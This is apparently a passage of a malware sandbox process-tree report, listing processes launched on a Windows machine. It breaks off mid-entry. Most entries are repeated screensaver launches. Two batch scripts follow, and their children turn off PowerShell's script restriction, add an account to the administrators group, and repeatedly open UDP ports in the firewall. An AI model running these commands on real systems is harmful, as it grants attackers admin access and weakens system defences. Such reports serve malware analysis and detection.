- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4040
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4532
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5044
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3744
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1572
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3372
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2652
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:900
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2908
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3492
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4824
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5076
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2408
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:204
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5052
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3560
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3924
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:920
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1760
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2308
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4844
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4180
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4588
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4576
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1044
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1712
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4260
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1208
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1960
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4244
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3244
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3156
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3168
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4468
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:728
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2268
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4892
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3644
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4996
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4760
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:528
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4284
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4448
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1380
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3404
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5060
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2156
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4368
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3492
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:672
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4532
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:320
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3372
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4448
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4308
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2952
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3292
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4024
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3360
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:760
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1380
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2496
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2420
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4368
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:920
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1992
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1380
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1956
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4840
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4288
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1212
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:448
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2084
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1544
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3108
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3664
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3672
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1408
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2904
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1348
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3268
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1212
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:448
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2476
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2376
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4516
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4340
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5104
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3404
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1772
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5040
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2244
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1028
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1952
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1772
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4340
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2308
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4280
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K black.bat
  2⤵
  PID:3200
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1968
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2420
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2496
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2488
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3884
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2084
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4540
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2988
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1732
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3372
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4184
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1712
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4696
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3744
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4228
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1592
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3644
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4892
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3268
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5108
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1684
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4576
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2376
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4996
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2472
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4024
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1492
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2304
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1608
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3232
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4184
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4712
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:692
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1500
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2392
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4308
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4996
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1768
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4844
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1264
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1584
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4572
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1952
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1208
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2476
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2188
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4448
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1656
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4496
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1348
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:528
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:116
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1356
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2408
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4304
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4080
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3560
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3108
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1880
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3232
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4040
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1408
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4552
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4116
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4308
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1940
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4304
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3104
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:60
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3012
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2268
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2952
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1760
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:656
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:112
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4552
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4228
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4456
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3980
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3320
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1964
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2556
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:816
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:204
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1380
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2904
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3068
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:528
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2316
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3996
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:672
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1712
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4840
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2128
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:996
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4728
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1940
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5056
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2348
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3312
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3644
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3104
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1752
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1348
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2832
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3844
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2728
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4532
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4900
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1992
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1576
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3316
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4512
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3404
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3108
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4568
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3836
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3068
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1956
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1768
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2392
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5104
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:528
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5080
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1592
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4360
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4712
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K FuckPorts.cmd
  2⤵
  PID:1080
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Set-ExecutionPolicy Unrestricted"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2320
- - C:\Windows\system32\net.exe
    net localgroup administrators session /ADD
    3⤵
    PID:1412
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4380
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:2416
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4844
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:2340
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:3104
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4664
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:5040
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:5088
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4380
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:1768
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:3012
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:2004
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:4468
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:3604
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:2412
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4304
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:2388
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4180
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:2412
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:732
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:704
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4468
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 28854" dir=out action=allow protocol=UDP localport=7957
    3⤵
    PID:3572
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24125" dir=in action=allow protocol=UDP localport=18512
    3⤵
    PID:4816
- - C:\Windows\system32\netsh.exe
